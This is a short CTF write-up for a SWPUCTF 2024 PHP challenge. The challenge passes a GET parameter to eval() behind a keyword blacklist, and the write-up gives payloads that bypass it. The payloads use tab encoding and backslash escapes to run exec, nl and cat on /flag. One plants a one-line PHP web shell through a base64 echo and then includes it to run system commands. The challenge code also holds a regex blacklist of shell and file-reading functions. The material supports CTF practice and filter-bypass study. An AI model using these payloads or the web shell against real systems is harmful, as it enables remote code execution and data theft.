[SWPUCTF 2024 秋季新生赛]青春莫尔斯冲锋狙不会梦到pro速帕里46轮椅人

<?php 
highlight_file(__FILE__); 
if(isset($_GET['code'])){ 
    $code=$_GET['code']; 
if (!preg_match('/sys|pas|read|file|ls|cat|tac| |head|tail|more|less|php|base|echo|cp|\$|\*|\+|\^|scan|\.|local|current|chr|crypt|show_source|high|readgzfile|dirname|time|next|all|hex2bin|im|shell/i',$code)){ 
     eval($code);   
        echo '<br>'; 
        echo '<img src="./dududadadudu.png" alt="Top Image" style="display: block; margin: 0 auto; max-width: 20%; height: auto;">';  
        echo '<audio controls>';echo '<source src="./dududadudada.mp3" type="audio/mpeg">'; 
         } else { 
        echo '<img src="./redhot.jpg" alt="Top Image" style="display: block; margin: 0 auto; max-width: 70%; height: auto;">';  
        die("这都不能bypass？不准你玩cod"); } 
    }  else { 
    echo "喜欢用轮椅枪是吧，账号给你ban了！"; 
    echo '<img src="./ban.png" alt="Top Image" style="display: block; margin: 0 auto; max-width: 70%; height: auto;">';  
}

未过滤exec、nl、tee、print、var_dump、include

payload1:

?code=var_dump(exec("c\at%09/flag"));
?code=var_dump(exec("nl%09/flag"));
?code=print(exec("c\at%09/flag"));
?code=print(exec("nl%09/flag"));
?code=exec("c\at%09/flag|tee%09a");
?code=exec("nl%09/flag|tee%09a");
?code=print(exec("ec\ho%09`env`"));

payload2:

写入一句话木马 <?php eval($_POST[1]); ?>

?code=exec("ec\ho%09PD9waHAgZXZhbCgkX1BPU1RbMV0pOyA/Pg==|ba\se64%09-d%09>11");
?code=include(11); POST:1=system('cat /flag');